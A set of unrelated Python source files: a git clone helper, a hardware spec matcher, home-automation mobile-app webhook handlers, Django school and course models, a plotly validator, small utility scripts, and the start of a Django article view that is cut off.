def git_clone(git_repo_url, git_repo_dir):
try:
logger.info('Fetching from %s to %s', git_repo_url, git_repo_dir)
git.clone(git_repo_url, git_repo_dir, _out=sys.stdout,
_err=sys.stderr, _fg=True)
except ErrorReturnCode as e:
raise CommandError(e)
def git_clone_to_source(env_path, git_repo):
git_url = CONSTANTS['repos']['url']
git_repo_dir = os.path.join(env_path, 'source', git_repo)
git_repo_url = '%s/%s' % (git_url, git_repo)
git_clone(git_repo_url, git_repo_dir)
logger.success('Fetched %s', git_repo)
|
#
# Copyright (C) 2013-2015 eNovance SAS <licensing@enovance.com>
#
# Author: Frederic Lepied <frederic.lepied@enovance.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
'''Functions to match according to a requirement specification.'''
import ipaddress
import logging
import re
import sys
LOG = logging.getLogger('hardware.matcher')
def _adder(array, index, value):
'Auxiliary function to add a value to an array.'
array[index] = value
def _appender(array, index, value):
'Auxiliary function to append a value to an array.'
try:
array[index].append(value)
except KeyError:
array[index] = [value, ]
def _range(elt, minval, maxval):
'Helper for match_spec.'
return float(elt) >= float(minval) and float(elt) <= float(maxval)
def _gt(left, right):
'Helper for match_spec.'
return float(left) > float(right)
def _ge(left, right):
'Helper for match_spec.'
return float(left) >= float(right)
def _lt(left, right):
'Helper for match_spec.'
return float(left) < float(right)
def _le(left, right):
'Helper for match_spec.'
return float(left) <= float(right)
def _not(_, right):
'Helper for match_spec.'
return not right
def _and(_, left, right):
'Helper for match_spec.'
return left and right
def _or(_, left, right):
'Helper for match_spec.'
return left or right
def _network(left, right):
'Helper for match_spec.'
return ipaddress.IPv4Address(left) in ipaddress.IPv4Network(right)
def _regexp(left, right):
'Helper for match_spec.'
return re.search(right, left) is not None
def _in(elt, *lst):
'Helper for match_spec.'
return elt in lst
_FUNC_REGEXP = re.compile(r'^([^(]+)' # function name
r'\(\s*([^,]+)' # first argument
r'(?:\s*,\s*(.+))?' # remaining optional arguments
r'\)$') # last parenthesis
def _call_func(func, implicit, res):
'Helper function for extract_result and match_spec'
args = [implicit, res.group(2)]
# split the optional arguments if we have some
if res.group(3):
args = args + re.split(r'\s*,\s*', res.group(3))
# remove strings delimiters
args = [x.strip('\'"') for x in args]
# call function
args = [_extract_result(implicit, x) for x in args]
return func(*args)
def _extract_result(implicit, expr):
'Helper function for match_spec'
res = _FUNC_REGEXP.search(expr)
if res:
func_name = '_' + res.group(1)
if func_name in globals():
return _call_func(globals()[func_name], implicit, res)
else:
return expr
else:
return expr
def match_spec(spec, lines, arr, adder=_adder):
'Match a line according to a spec and store variables in <arr>.'
# match a line without variable
for idx in range(len(lines)):
if lines[idx] == spec:
res = lines[idx]
del lines[idx]
return res
# match a line with a variable, a function or both
for lidx in range(len(lines)):
line = lines[lidx]
varidx = []
for idx in range(4):
# try to split the variable and function parts if we have both
if spec[idx][0] == '$':
parts = spec[idx].split('=')
if len(parts) == 2:
var, func = parts
matched = False
else:
var = func = spec[idx]
else:
var = func = spec[idx]
# Match a function
if func[-1] == ')':
res = _FUNC_REGEXP.search(func)
if res:
func_name = '_' + res.group(1)
if func_name in globals():
if not _call_func(globals()[func_name],
line[idx], res):
if var == func:
break
else:
if var == func:
continue
matched = True
else:
if var == func:
break
# Match a variable
if ((var == func) or (var != func and matched)) and var[0] == '$':
if adder == _adder and var[1:] in arr:
if arr[var[1:]] != line[idx]:
break
varidx.append((idx, var[1:]))
# Match the full string
elif line[idx] != spec[idx]:
break
else:
for i, var in varidx:
adder(arr, var, line[i])
res = lines[lidx]
del lines[lidx]
return res
return False
def match_all(lines, specs, arr, arr2, debug=False, level=0):
'''Match all lines according to a spec.
Store variables starting with a single $ in <arr>. Variables starting
with two $ signs, like $$vda, are stored in both arr and arr2.
'''
# Work on a copy of lines to avoid changing the real lines because
# match_spec removes the matched line to not match it again on next
# calls.
lines = list(lines)
specs = list(specs)
copy_arr = dict(arr)
points = []
# Prevent infinite loops
if level == 50:
return False
# Match lines using specs
while len(specs) > 0:
copy_specs = list(specs)
spec = specs.pop(0)
line = match_spec(spec, lines, arr)
if debug:
sys.stderr.write('match_spec: %s %s\n' % (line, spec))
# No match
if not line:
# Backtrack on the backtracking points
while len(points) > 0:
lines, specs, new_arr = points.pop()
if debug:
sys.stderr.write('retrying with: %s\n' %
(new_arr,))
if match_all(lines, specs, new_arr, arr2, debug, level + 1):
# Copy arr back
for k in new_arr:
arr[k] = new_arr[k]
if debug:
sys.stderr.write('success: %d\n' % level)
return True
if level == 0 and debug:
sys.stderr.write('spec: %s not matched\n' % str(spec))
return False
else:
# Store backtracking points when we find a new variable
if arr != copy_arr:
copy_lines = list(lines)
# Put the matching line at the end of the lines
copy_lines.append(line)
points.append((copy_lines, copy_specs, copy_arr))
copy_arr = dict(arr)
if debug:
sys.stderr.write('new var: %s %s\n' % (arr, line))
# Manage $$ variables
for key in arr:
if key[0] == '$':
nkey = key[1:]
arr[nkey] = arr[key]
arr2[nkey] = arr[key]
del arr[key]
return True
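# Illustrative sketch of the spec syntax handled above (hypothetical data, not
# part of this module): with
#     lines = [('disk', 'sda', 'size', '100'), ('disk', 'sdb', 'size', '50')]
#     specs = [('disk', '$disk', 'size', 'gt(20)')]
# match_all(lines, specs, arr, arr2) stores {'disk': 'sda'} in arr; writing the
# variable as '$$disk' would additionally copy the value into arr2.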
def match_multiple(lines, spec, arr):
'Use spec to find all the matching lines and gather variables.'
ret = False
lines = list(lines)
while match_spec(spec, lines, arr, adder=_appender):
ret = True
return ret
def generate_filename_and_macs(items):
'''Generate a file name for a hardware item using DMI information
(product name and version); if the DMI serial number is available
we use it, otherwise we fall back to the first mac address.
As a result, we get a filename like:
<dmi_product_name>-<dmi_product_version>-{dmi_serial_num|mac_address}
'''
# Duplicate items as it will be modified by match_* functions
hw_items = list(items)
sysvars = {}
sysvars['sysname'] = ''
if match_spec(('system', 'product', 'vendor', '$sysprodvendor'),
hw_items, sysvars):
sysvars['sysname'] += (re.sub(r'\W+', '', sysvars['sysprodvendor']) +
'-')
if match_spec(('system', 'product', 'name', '$sysprodname'),
hw_items, sysvars):
sysvars['sysname'] = re.sub(r'\W+', '', sysvars['sysprodname']) + '-'
# Let's use any existing DMI serial number or take the first mac address
if match_spec(('system', 'product', 'serial', '$sysserial'),
hw_items, sysvars):
sysvars['sysname'] += re.sub(r'\W+', '', sysvars['sysserial']) + '-'
# we always need to have the mac addresses for pxemngr
if match_multiple(hw_items,
('network', '$eth', 'serial', '$serial'),
sysvars):
sysvars['sysname'] += sysvars['serial'][0].replace(':', '-')
else:
LOG.warning('unable to detect network macs')
return sysvars
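# Example of the resulting name (hypothetical values, for illustration only):
# for product vendor 'Dell', product name 'PowerEdgeR630', serial 'ABC123' and
# first mac 'aa:bb:cc:dd:ee:ff', sysvars['sysname'] ends up as
# 'PowerEdgeR630-ABC123-aa-bb-cc-dd-ee-ff' (note that the product name match
# overwrites any vendor prefix, as coded above).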
# matcher.py ends here
|
"""Webhook handlers for mobile_app."""
from functools import wraps
import logging
import secrets
from aiohttp.web import HTTPBadRequest, Request, Response, json_response
from nacl.secret import SecretBox
import voluptuous as vol
from openpeerpower.components.binary_sensor import (
DEVICE_CLASSES as BINARY_SENSOR_CLASSES,
)
from openpeerpower.components.device_tracker import (
ATTR_BATTERY,
ATTR_GPS,
ATTR_GPS_ACCURACY,
ATTR_LOCATION_NAME,
)
from openpeerpower.components.frontend import MANIFEST_JSON
from openpeerpower.components.sensor import DEVICE_CLASSES as SENSOR_CLASSES
from openpeerpower.components.zone.const import DOMAIN as ZONE_DOMAIN
from openpeerpower.const import (
ATTR_DOMAIN,
ATTR_SERVICE,
ATTR_SERVICE_DATA,
CONF_WEBHOOK_ID,
HTTP_BAD_REQUEST,
HTTP_CREATED,
)
from openpeerpower.core import EventOrigin
from openpeerpower.exceptions import OpenPeerPowerError, ServiceNotFound, TemplateError
from openpeerpower.helpers import config_validation as cv, device_registry as dr
from openpeerpower.helpers.dispatcher import async_dispatcher_send
from openpeerpower.helpers.template import attach
from openpeerpower.helpers.typing import OpenPeerPowerType
from openpeerpower.util.decorator import Registry
from .const import (
ATTR_ALTITUDE,
ATTR_APP_DATA,
ATTR_APP_VERSION,
ATTR_COURSE,
ATTR_DEVICE_ID,
ATTR_DEVICE_NAME,
ATTR_EVENT_DATA,
ATTR_EVENT_TYPE,
ATTR_MANUFACTURER,
ATTR_MODEL,
ATTR_OS_VERSION,
ATTR_SENSOR_ATTRIBUTES,
ATTR_SENSOR_DEVICE_CLASS,
ATTR_SENSOR_ICON,
ATTR_SENSOR_NAME,
ATTR_SENSOR_STATE,
ATTR_SENSOR_TYPE,
ATTR_SENSOR_TYPE_BINARY_SENSOR,
ATTR_SENSOR_TYPE_SENSOR,
ATTR_SENSOR_UNIQUE_ID,
ATTR_SENSOR_UOM,
ATTR_SPEED,
ATTR_SUPPORTS_ENCRYPTION,
ATTR_TEMPLATE,
ATTR_TEMPLATE_VARIABLES,
ATTR_VERTICAL_ACCURACY,
ATTR_WEBHOOK_DATA,
ATTR_WEBHOOK_ENCRYPTED,
ATTR_WEBHOOK_ENCRYPTED_DATA,
ATTR_WEBHOOK_TYPE,
CONF_CLOUDHOOK_URL,
CONF_REMOTE_UI_URL,
CONF_SECRET,
DATA_CONFIG_ENTRIES,
DATA_DELETED_IDS,
DATA_STORE,
DOMAIN,
ERR_ENCRYPTION_ALREADY_ENABLED,
ERR_ENCRYPTION_NOT_AVAILABLE,
ERR_ENCRYPTION_REQUIRED,
ERR_SENSOR_DUPLICATE_UNIQUE_ID,
ERR_SENSOR_NOT_REGISTERED,
SIGNAL_LOCATION_UPDATE,
SIGNAL_SENSOR_UPDATE,
)
from .helpers import (
_decrypt_payload,
empty_okay_response,
error_response,
registration_context,
safe_registration,
savable_state,
supports_encryption,
webhook_response,
)
_LOGGER = logging.getLogger(__name__)
WEBHOOK_COMMANDS = Registry()
COMBINED_CLASSES = set(BINARY_SENSOR_CLASSES + SENSOR_CLASSES)
SENSOR_TYPES = [ATTR_SENSOR_TYPE_BINARY_SENSOR, ATTR_SENSOR_TYPE_SENSOR]
WEBHOOK_PAYLOAD_SCHEMA = vol.Schema(
{
vol.Required(ATTR_WEBHOOK_TYPE): cv.string,
vol.Required(ATTR_WEBHOOK_DATA, default={}): vol.Any(dict, list),
vol.Optional(ATTR_WEBHOOK_ENCRYPTED, default=False): cv.boolean,
vol.Optional(ATTR_WEBHOOK_ENCRYPTED_DATA): cv.string,
}
)
def validate_schema(schema):
"""Decorate a webhook function with a schema."""
if isinstance(schema, dict):
schema = vol.Schema(schema)
def wrapper(func):
"""Wrap function so we validate schema."""
@wraps(func)
async def validate_and_run(opp, config_entry, data):
"""Validate input and call handler."""
try:
data = schema(data)
except vol.Invalid as ex:
err = vol.humanize.humanize_error(data, ex)
_LOGGER.error("Received invalid webhook payload: %s", err)
return empty_okay_response()
return await func(opp, config_entry, data)
return validate_and_run
return wrapper
async def handle_webhook(
opp: OpenPeerPowerType, webhook_id: str, request: Request
) -> Response:
"""Handle webhook callback."""
if webhook_id in opp.data[DOMAIN][DATA_DELETED_IDS]:
return Response(status=410)
config_entry = opp.data[DOMAIN][DATA_CONFIG_ENTRIES][webhook_id]
try:
req_data = await request.json()
except ValueError:
_LOGGER.warning("Received invalid JSON from mobile_app")
return empty_okay_response(status=HTTP_BAD_REQUEST)
if (
ATTR_WEBHOOK_ENCRYPTED not in req_data
and config_entry.data[ATTR_SUPPORTS_ENCRYPTION]
):
_LOGGER.warning(
"Refusing to accept unencrypted webhook from %s",
config_entry.data[ATTR_DEVICE_NAME],
)
return error_response(ERR_ENCRYPTION_REQUIRED, "Encryption required")
try:
req_data = WEBHOOK_PAYLOAD_SCHEMA(req_data)
except vol.Invalid as ex:
err = vol.humanize.humanize_error(req_data, ex)
_LOGGER.error("Received invalid webhook payload: %s", err)
return empty_okay_response()
webhook_type = req_data[ATTR_WEBHOOK_TYPE]
webhook_payload = req_data.get(ATTR_WEBHOOK_DATA, {})
if req_data[ATTR_WEBHOOK_ENCRYPTED]:
enc_data = req_data[ATTR_WEBHOOK_ENCRYPTED_DATA]
webhook_payload = _decrypt_payload(config_entry.data[CONF_SECRET], enc_data)
if webhook_type not in WEBHOOK_COMMANDS:
_LOGGER.error("Received invalid webhook type: %s", webhook_type)
return empty_okay_response()
_LOGGER.debug(
"Received webhook payload for type %s: %s", webhook_type, webhook_payload
)
return await WEBHOOK_COMMANDS[webhook_type](opp, config_entry, webhook_payload)
@WEBHOOK_COMMANDS.register("call_service")
@validate_schema(
{
vol.Required(ATTR_DOMAIN): cv.string,
vol.Required(ATTR_SERVICE): cv.string,
vol.Optional(ATTR_SERVICE_DATA, default={}): dict,
}
)
async def webhook_call_service(opp, config_entry, data):
"""Handle a call service webhook."""
try:
await opp.services.async_call(
data[ATTR_DOMAIN],
data[ATTR_SERVICE],
data[ATTR_SERVICE_DATA],
blocking=True,
context=registration_context(config_entry.data),
)
except (vol.Invalid, ServiceNotFound, Exception) as ex:
_LOGGER.error(
"Error when calling service during mobile_app "
"webhook (device name: %s): %s",
config_entry.data[ATTR_DEVICE_NAME],
ex,
)
raise HTTPBadRequest()
return empty_okay_response()
@WEBHOOK_COMMANDS.register("fire_event")
@validate_schema(
{
vol.Required(ATTR_EVENT_TYPE): cv.string,
vol.Optional(ATTR_EVENT_DATA, default={}): dict,
}
)
async def webhook_fire_event(opp, config_entry, data):
"""Handle a fire event webhook."""
event_type = data[ATTR_EVENT_TYPE]
opp.bus.async_fire(
event_type,
data[ATTR_EVENT_DATA],
EventOrigin.remote,
context=registration_context(config_entry.data),
)
return empty_okay_response()
@WEBHOOK_COMMANDS.register("render_template")
@validate_schema(
{
str: {
vol.Required(ATTR_TEMPLATE): cv.template,
vol.Optional(ATTR_TEMPLATE_VARIABLES, default={}): dict,
}
}
)
async def webhook_render_template(opp, config_entry, data):
"""Handle a render template webhook."""
resp = {}
for key, item in data.items():
try:
tpl = item[ATTR_TEMPLATE]
attach(opp, tpl)
resp[key] = tpl.async_render(item.get(ATTR_TEMPLATE_VARIABLES))
except TemplateError as ex:
resp[key] = {"error": str(ex)}
return webhook_response(resp, registration=config_entry.data)
@WEBHOOK_COMMANDS.register("update_location")
@validate_schema(
{
vol.Optional(ATTR_LOCATION_NAME): cv.string,
vol.Required(ATTR_GPS): cv.gps,
vol.Required(ATTR_GPS_ACCURACY): cv.positive_int,
vol.Optional(ATTR_BATTERY): cv.positive_int,
vol.Optional(ATTR_SPEED): cv.positive_int,
vol.Optional(ATTR_ALTITUDE): vol.Coerce(float),
vol.Optional(ATTR_COURSE): cv.positive_int,
vol.Optional(ATTR_VERTICAL_ACCURACY): cv.positive_int,
}
)
async def webhook_update_location(opp, config_entry, data):
"""Handle an update location webhook."""
opp.helpers.dispatcher.async_dispatcher_send(
SIGNAL_LOCATION_UPDATE.format(config_entry.entry_id), data
)
return empty_okay_response()
@WEBHOOK_COMMANDS.register("update_registration")
@validate_schema(
{
vol.Optional(ATTR_APP_DATA, default={}): dict,
vol.Required(ATTR_APP_VERSION): cv.string,
vol.Required(ATTR_DEVICE_NAME): cv.string,
vol.Required(ATTR_MANUFACTURER): cv.string,
vol.Required(ATTR_MODEL): cv.string,
vol.Optional(ATTR_OS_VERSION): cv.string,
}
)
async def webhook_update_registration(opp, config_entry, data):
"""Handle an update registration webhook."""
new_registration = {**config_entry.data, **data}
device_registry = await dr.async_get_registry(opp)
device_registry.async_get_or_create(
config_entry_id=config_entry.entry_id,
identifiers={(DOMAIN, config_entry.data[ATTR_DEVICE_ID])},
manufacturer=new_registration[ATTR_MANUFACTURER],
model=new_registration[ATTR_MODEL],
name=new_registration[ATTR_DEVICE_NAME],
sw_version=new_registration[ATTR_OS_VERSION],
)
opp.config_entries.async_update_entry(config_entry, data=new_registration)
return webhook_response(
safe_registration(new_registration),
registration=new_registration,
)
@WEBHOOK_COMMANDS.register("enable_encryption")
async def webhook_enable_encryption(opp, config_entry, data):
"""Handle a encryption enable webhook."""
if config_entry.data[ATTR_SUPPORTS_ENCRYPTION]:
_LOGGER.warning(
"Refusing to enable encryption for %s because it is already enabled!",
config_entry.data[ATTR_DEVICE_NAME],
)
return error_response(
ERR_ENCRYPTION_ALREADY_ENABLED, "Encryption already enabled"
)
if not supports_encryption():
_LOGGER.warning(
"Unable to enable encryption for %s because libsodium is unavailable!",
config_entry.data[ATTR_DEVICE_NAME],
)
return error_response(ERR_ENCRYPTION_NOT_AVAILABLE, "Encryption is unavailable")
secret = secrets.token_hex(SecretBox.KEY_SIZE)
data = {**config_entry.data, ATTR_SUPPORTS_ENCRYPTION: True, CONF_SECRET: secret}
opp.config_entries.async_update_entry(config_entry, data=data)
return json_response({"secret": secret})
@WEBHOOK_COMMANDS.register("register_sensor")
@validate_schema(
{
vol.Optional(ATTR_SENSOR_ATTRIBUTES, default={}): dict,
vol.Optional(ATTR_SENSOR_DEVICE_CLASS): vol.All(
vol.Lower, vol.In(COMBINED_CLASSES)
),
vol.Required(ATTR_SENSOR_NAME): cv.string,
vol.Required(ATTR_SENSOR_TYPE): vol.In(SENSOR_TYPES),
vol.Required(ATTR_SENSOR_UNIQUE_ID): cv.string,
vol.Optional(ATTR_SENSOR_UOM): cv.string,
vol.Required(ATTR_SENSOR_STATE): vol.Any(bool, str, int, float),
vol.Optional(ATTR_SENSOR_ICON, default="mdi:cellphone"): cv.icon,
}
)
async def webhook_register_sensor(opp, config_entry, data):
"""Handle a register sensor webhook."""
entity_type = data[ATTR_SENSOR_TYPE]
unique_id = data[ATTR_SENSOR_UNIQUE_ID]
unique_store_key = f"{config_entry.data[CONF_WEBHOOK_ID]}_{unique_id}"
if unique_store_key in opp.data[DOMAIN][entity_type]:
_LOGGER.error("Refusing to re-register existing sensor %s!", unique_id)
return error_response(
ERR_SENSOR_DUPLICATE_UNIQUE_ID,
f"{entity_type} {unique_id} already exists!",
status=409,
)
data[CONF_WEBHOOK_ID] = config_entry.data[CONF_WEBHOOK_ID]
opp.data[DOMAIN][entity_type][unique_store_key] = data
try:
await opp.data[DOMAIN][DATA_STORE].async_save(savable_state(opp))
except OpenPeerPowerError as ex:
_LOGGER.error("Error registering sensor: %s", ex)
return empty_okay_response()
register_signal = "{}_{}_register".format(DOMAIN, data[ATTR_SENSOR_TYPE])
async_dispatcher_send(opp, register_signal, data)
return webhook_response(
{"success": True},
registration=config_entry.data,
status=HTTP_CREATED,
)
@WEBHOOK_COMMANDS.register("update_sensor_states")
@validate_schema(
vol.All(
cv.ensure_list,
[
vol.Schema(
{
vol.Optional(ATTR_SENSOR_ATTRIBUTES, default={}): dict,
vol.Optional(ATTR_SENSOR_ICON, default="mdi:cellphone"): cv.icon,
vol.Required(ATTR_SENSOR_STATE): vol.Any(bool, str, int, float),
vol.Required(ATTR_SENSOR_TYPE): vol.In(SENSOR_TYPES),
vol.Required(ATTR_SENSOR_UNIQUE_ID): cv.string,
}
)
],
)
)
async def webhook_update_sensor_states(opp, config_entry, data):
"""Handle an update sensor states webhook."""
resp = {}
for sensor in data:
entity_type = sensor[ATTR_SENSOR_TYPE]
unique_id = sensor[ATTR_SENSOR_UNIQUE_ID]
unique_store_key = f"{config_entry.data[CONF_WEBHOOK_ID]}_{unique_id}"
if unique_store_key not in opp.data[DOMAIN][entity_type]:
_LOGGER.error(
"Refusing to update non-registered sensor: %s", unique_store_key
)
err_msg = f"{entity_type} {unique_id} is not registered"
resp[unique_id] = {
"success": False,
"error": {"code": ERR_SENSOR_NOT_REGISTERED, "message": err_msg},
}
continue
entry = opp.data[DOMAIN][entity_type][unique_store_key]
new_state = {**entry, **sensor}
opp.data[DOMAIN][entity_type][unique_store_key] = new_state
safe = savable_state(opp)
try:
await opp.data[DOMAIN][DATA_STORE].async_save(safe)
except OpenPeerPowerError as ex:
_LOGGER.error("Error updating mobile_app registration: %s", ex)
return empty_okay_response()
async_dispatcher_send(opp, SIGNAL_SENSOR_UPDATE, new_state)
resp[unique_id] = {"success": True}
return webhook_response(resp, registration=config_entry.data)
@WEBHOOK_COMMANDS.register("get_zones")
async def webhook_get_zones(opp, config_entry, data):
"""Handle a get zones webhook."""
zones = [
opp.states.get(entity_id)
for entity_id in sorted(opp.states.async_entity_ids(ZONE_DOMAIN))
]
return webhook_response(zones, registration=config_entry.data)
@WEBHOOK_COMMANDS.register("get_config")
async def webhook_get_config(opp, config_entry, data):
"""Handle a get config webhook."""
opp_config = opp.config.as_dict()
resp = {
"latitude": opp_config["latitude"],
"longitude": opp_config["longitude"],
"elevation": opp_config["elevation"],
"unit_system": opp_config["unit_system"],
"location_name": opp_config["location_name"],
"time_zone": opp_config["time_zone"],
"components": opp_config["components"],
"version": opp_config["version"],
"theme_color": MANIFEST_JSON["theme_color"],
}
if CONF_CLOUDHOOK_URL in config_entry.data:
resp[CONF_CLOUDHOOK_URL] = config_entry.data[CONF_CLOUDHOOK_URL]
try:
resp[CONF_REMOTE_UI_URL] = opp.components.cloud.async_remote_ui_url()
except opp.components.cloud.CloudNotAvailable:
pass
return webhook_response(resp, registration=config_entry.data)
|
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
#------- Profile, Student, Teacher Model -------
## TODO: refactor CharField to TextField where appropriate and enforce maxlength in the HTML; the current usage is wrong.
class Profile(models.Model):
#username,first,last,email,password is extened from Django Auth User
user = models.OneToOneField(User, null=True, on_delete = models.SET_NULL)
street_address = models.CharField(max_length=200, blank=True)
city = models.CharField(max_length=100, blank=True)
state = models.CharField(max_length=100, blank=True)
zip_code = models.CharField(max_length=20, blank=True)
phone_number = models.CharField(max_length=20, blank=True)
emergency_contact = models.CharField(max_length=20, blank=True)
relationship = models.CharField(max_length=100, blank=True)
middle_name = models.CharField(max_length=50, blank=True)
birth_date = models.DateField(null=True, blank=True)
school_id = models.CharField(max_length=15, null=True, blank=True, default='0')
is_student = models.BooleanField('Student', default=False)
is_teacher = models.BooleanField('Teacher', default=False)
about = models.TextField(max_length=300, blank=True)
hobby = models.TextField(max_length=100, blank=True)
favorite_food = models.TextField(max_length=100, blank=True)
favorite_subject = models.TextField(max_length=100, blank=True)
def __str__(self):
if self.user is None:
return 'User deleted - ' + str(self.school_id)
else:
return self.user.get_full_name()
@receiver(post_save, sender=User)  # Create a Profile when a User is created.
def create_profile_object(sender, instance, created, **kwargs):
if created:
profile = Profile.objects.create(user=instance)
class Student(models.Model):
profile = models.OneToOneField(Profile, null=True, on_delete = models.SET_NULL)
user = models.OneToOneField(User, null=True, on_delete = models.SET_NULL)
# Course_taking = models.ForeignKey('Course',blank=True, null=True, on_delete = models.SET_NULL, related_name='enrolled_Course')
# classroom_taking = models.ManyToManyField('Classroom',blank=True)
def __str__(self):
return 'Student: ' + str(self.user.get_full_name()) #change to string
class Teacher(models.Model):
profile = models.OneToOneField(Profile,null=True, on_delete = models.SET_NULL)
user = models.OneToOneField(User, null=True, on_delete = models.SET_NULL, related_name='teacher')
def __str__(self):
return 'Teacher: ' + str(self.user.get_full_name()) #change to string
# --------------- Course, Classroom, Lesson Plan and Department's Model----------------------
class Course(models.Model):
course_number = models.CharField(max_length=20,default='12345678')
abbreviated_title = models.CharField(max_length=150,default='')
course_title = models.CharField(max_length=250,default='') #,unique=True)
maximum_credit = models.CharField(max_length=10,default='')
semester = models.CharField(max_length=50,default='')
year = models.CharField(max_length=4,default='')
teacher_name = models.CharField(max_length=50,default='')
description = models.CharField(max_length=450,default='')
# Alert: if related_name is used on a ForeignKey, _set cannot be used!
is_archive = models.BooleanField(default=False)
department = models.ForeignKey('Department',blank=True, null=True, on_delete = models.SET_NULL, related_name='belong_in_department')
teacher = models.ForeignKey('Teacher',blank=True, null=True, on_delete = models.SET_NULL, related_name='course_by_teacher')
create_date = models.DateField(auto_now_add=True , blank=True,null=True,)
# A Course is bound to the teacher and creates a classroom upon creation. More rooms can be added later
class Lesson_plan(models.Model):
course_title = models.CharField(max_length=50,default='')
teacher_idx = models.CharField(max_length=10,default='')
week_number = models.CharField(max_length=10,default='')
agenda = models.CharField(max_length=450,default='Agenda Goes Here')
monday_date = models.DateField(blank=True, null=True)
tuesday_date = models.DateField(blank=True, null=True)
wednesday_date = models.DateField(blank=True, null=True)
thursday_date = models.DateField(blank=True, null=True)
friday_date= models.DateField(blank=True, null=True)
monday_assignment = models.CharField(max_length=400,default='a')
tuesday_assignment= models.CharField(max_length=400,default='s')
wednesday_assignment= models.CharField(max_length=400,default='d')
thursday_assignment= models.CharField(max_length=400,default='f')
friday_assignment= models.CharField(max_length=400,default='g')
weekend_assignment = models.CharField(max_length=300,default='h')
teacher = models.ForeignKey('Teacher',blank=True, null=True, on_delete = models.SET_NULL)
course = models.ForeignKey('Course',blank=True, null=True, on_delete = models.SET_NULL)
last_modifield = models.DateTimeField(auto_now=True, blank=True,null=True,)
create_date = models.DateField(auto_now_add=True, blank=True,null=True,)
def __str__(self):
return 'Lesson plan for '+self.course_title +' Teacher: '+ str(self.teacher)
class Classroom(models.Model):
course_title = models.CharField(max_length=50,default='')
course_number = models.CharField(max_length=20,default='')
teacher_name = models.CharField(max_length=50,default='')
teacher_idx = models.CharField(max_length=10,default='')
room_number = models.CharField(max_length=10,default='TBA')
time = models.TimeField(blank=True,null=True)
description = models.CharField(max_length=300,default='TBA')
# Use for statement to get value
# Course = models.ManyToManyField(Course, blank=True)
is_archive = models.BooleanField(default=False)
semester = models.CharField(max_length=50,default='')
year = models.CharField(max_length=4,default='')
teacher = models.ForeignKey('Teacher',blank=True, null=True, on_delete = models.SET_NULL, related_name='classroom_by_teacher')
course = models.ForeignKey('Course',blank=True, null=True, on_delete = models.SET_NULL, related_name='course_in_classroom')
student = models.ManyToManyField(Student, blank=True)
def __str__(self):
return 'Course: ' + self.course_title +' Room #: '+self.room_number
@receiver(post_save, sender=Course)
def create_classroom_object(sender, instance, created, **kwargs):
if created:
classroom = Classroom.objects.create(course_title=instance.course_title, teacher_name=instance.teacher_name,
course=instance, teacher=instance.teacher, semester=instance.semester, year=instance.year)
# To Find the Classroom:
# teacher = Teacher.objects.filter(user=request.user)
# Course = Course.objects.filter(teacher_set=teacher, name ='Course_name')
# classroom = Classroom.objects.filter(teacher=teacher).filter(Course=Course)
class Department(models.Model):
description = models.CharField(max_length=450,default='Department Description')
name = models.CharField(max_length=75,default='', unique=True)
# Course = models.ManyToManyField('Course',blank=True)
teacher = models.ManyToManyField(Teacher,blank=True)
student = models.ManyToManyField(Student,blank=True)
def __str__(self):
return 'LC High School ' + self.name + ' department.'
|
import _plotly_utils.basevalidators
class YValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self,
plotly_name='y',
parent_name='scattergeo.marker.colorbar',
**kwargs
):
super(YValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='calc',
max=3,
min=-2,
role='style',
**kwargs
)
|
import os
import sys
import imageio
import tensorflow as tf
import numpy as np
import pydicom
from PIL import Image
import weights
#takes the root folder path and returns a list of pictures
def collect_pictures(path):
pic_list = []
full_path_list = []
for dirName, subdirList, fileList in os.walk(path):
# print('test')
for filename in fileList:
if ".png" in filename.lower() or ".jpg" in filename.lower():
full_path_list.append(os.path.join(dirName,filename))
for im in full_path_list:
pic_list.append(imageio.imread(im))
return pic_list
#takes a list of pictures and returns a list of matrices
def flip_to_mat(images):
matrix_list = []
for im in images:
arr = np.array(im)
arr = arr.reshape(1, -1)
matrix_list.append(arr)
return matrix_list
if __name__ == "__main__":
return flip_to_mat(collect_pictures(sys.argv[1]))
|
from ibis.backends.pandas.execution.arrays import * # noqa: F401,F403
from ibis.backends.pandas.execution.decimal import * # noqa: F401,F403
from ibis.backends.pandas.execution.generic import * # noqa: F401,F403
from ibis.backends.pandas.execution.join import * # noqa: F401,F403
from ibis.backends.pandas.execution.maps import * # noqa: F401,F403
from ibis.backends.pandas.execution.selection import * # noqa: F401,F403
from ibis.backends.pandas.execution.strings import * # noqa: F401,F403
from ibis.backends.pandas.execution.structs import * # noqa: F401,F403
from ibis.backends.pandas.execution.temporal import * # noqa: F401,F403
from ibis.backends.pandas.execution.timecontext import * # noqa: F401,F403
from ibis.backends.pandas.execution.window import * # noqa: F401,F403
|
import logging
import os
import platform
import shutil
import sys
from pathlib import Path
logger = logging.getLogger(__name__)
def ensure_wkhtmltopdf(): # pragma: no cover
if shutil.which("wkhtmltopdf") is None:
if platform.system() == "Windows":
wkhtmltopdf_path = _find_wkhtmltopdf_path()
if wkhtmltopdf_path and wkhtmltopdf_path.exists():
logger.debug(f"Found wkhtmltopdf at {wkhtmltopdf_path}")
os.environ["PATH"] += os.pathsep + str(wkhtmltopdf_path.parent)
return
logger.error("You need to install wkhtmltopdf to use --mode-webclips=PDF")
sys.exit(1)
def _find_wkhtmltopdf_path(): # pragma: no cover
import winreg # noqa: WPS433
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\wkhtmltopdf") as key:
return Path(winreg.QueryValueEx(key, "PdfPath")[0])
except FileNotFoundError:
return None
|
from django.shortcuts import redirect
from django.shortcuts import render
from django.core.paginator import Paginator
from django.contrib.auth.decorators import login_required
from article.forms import ArticleForm
from article.models import Article
from block.models import Block
from comment.models import Comment
def article_list(request, block_id):
ARTICLE_CNT_1PAGE = 1
page_no = int(request.GET.get("page_no", "1"))
block_id = int(block_id)
block = Block.objects.get(id=block_id)
articles_objs = Article.objects.filter(block=block, status=0).order_by("-id")
